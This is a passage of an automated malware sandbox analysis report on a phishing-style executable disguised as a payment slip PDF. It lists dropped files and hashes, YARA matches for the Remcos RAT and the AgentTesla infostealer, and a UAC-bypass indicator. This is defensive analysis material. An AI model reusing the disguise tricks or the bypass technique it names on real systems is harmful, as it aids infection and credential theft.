                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_06AA2FE824_2_06AA2FE8
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_06AA0B3024_2_06AA0B30
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_072C266824_2_072C2668
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe 41EB6FF6BA3D97A93130C3F670A1453B4FFA5F6CC8F7E8960A42648CFFEB2BD5
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\conserver.exe 41EB6FF6BA3D97A93130C3F670A1453B4FFA5F6CC8F7E8960A42648CFFEB2BD5
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\host.exe E6720928EA03235A4A2AE2183D8E82483EAB11C5D77EC554CA3D85CC69D244B2
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: String function: 00402073 appears 51 times
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: String function: 00432B90 appears 53 times
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: String function: 00432525 appears 42 times
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: String function: 004169A7 appears 87 times
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: String function: 0044DB70 appears 41 times
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: String function: 004165FF appears 35 times
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: String function: 00412968 appears 78 times
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: String function: 00421A32 appears 43 times
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: String function: 00416760 appears 69 times
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: String function: 0044407A appears 37 times
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: String function: 00402073 appears 51 times
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: String function: 00432B90 appears 53 times
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: String function: 00432525 appears 41 times
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190274225.0000000004EC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs Payment_Slip.pdf.exe
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000025A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs Payment_Slip.pdf.exe
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1185558701.000000000070E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment_Slip.pdf.exe
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000023A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Payment_Slip.pdf.exe
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000024BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs Payment_Slip.pdf.exe
                              Source: Payment_Slip.pdf.exe, 00000000.00000000.1136659538.0000000000110000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameImLd.exe4 vs Payment_Slip.pdf.exe
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1191644087.0000000008250000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Payment_Slip.pdf.exe
                              Source: Payment_Slip.pdf.exe, 00000005.00000002.3616615800.0000000004A34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Payment_Slip.pdf.exe
                              Source: Payment_Slip.pdf.exe, 00000005.00000002.3616254884.00000000049BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef61e4e21-df97-4d15-8719-53241de53aab.exe4 vs Payment_Slip.pdf.exe
                              Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef61e4e21-df97-4d15-8719-53241de53aab.exe4 vs Payment_Slip.pdf.exe
                              Source: Payment_Slip.pdf.exe, 00000005.00000002.3614283187.00000000013E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef61e4e21-df97-e vs Payment_Slip.pdf.exe
                              Source: Payment_Slip.pdf.exeBinary or memory string: OriginalFileName vs Payment_Slip.pdf.exe
                              Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Payment_Slip.pdf.exe
                              Source: Payment_Slip.pdf.exeBinary or memory string: OriginalFilenameImLd.exe4 vs Payment_Slip.pdf.exe
                              Source: Payment_Slip.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                              Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                              Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                              Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                              Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                              Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                              Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                              Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                              Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                              Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                              Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                              Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                              Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                              Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                              Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                              Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                              Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                              Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                              Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                              Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                              Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                              Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                              Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                              Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                              Source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                              Source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                              Source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPEDMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPEDMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPEDMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPEDMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                              Source: Payment_Slip.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: mHTmhPhJy.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: host.exe.5.dr, P.csCryptographic APIs: 'TransformFinalBlock'
                              Source: host.exe.5.dr, P.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                              Source: host.exe.5.dr, P.csCryptographic APIs: 'TransformFinalBlock'
                              Source: host.exe.5.dr, P.csCryptographic APIs: 'TransformFinalBlock'
                              Source: host.exe.5.dr, N.csCryptographic APIs: 'TransformFinalBlock'
                              Source: host.exe.5.dr, N.csCryptographic APIs: 'TransformFinalBlock'
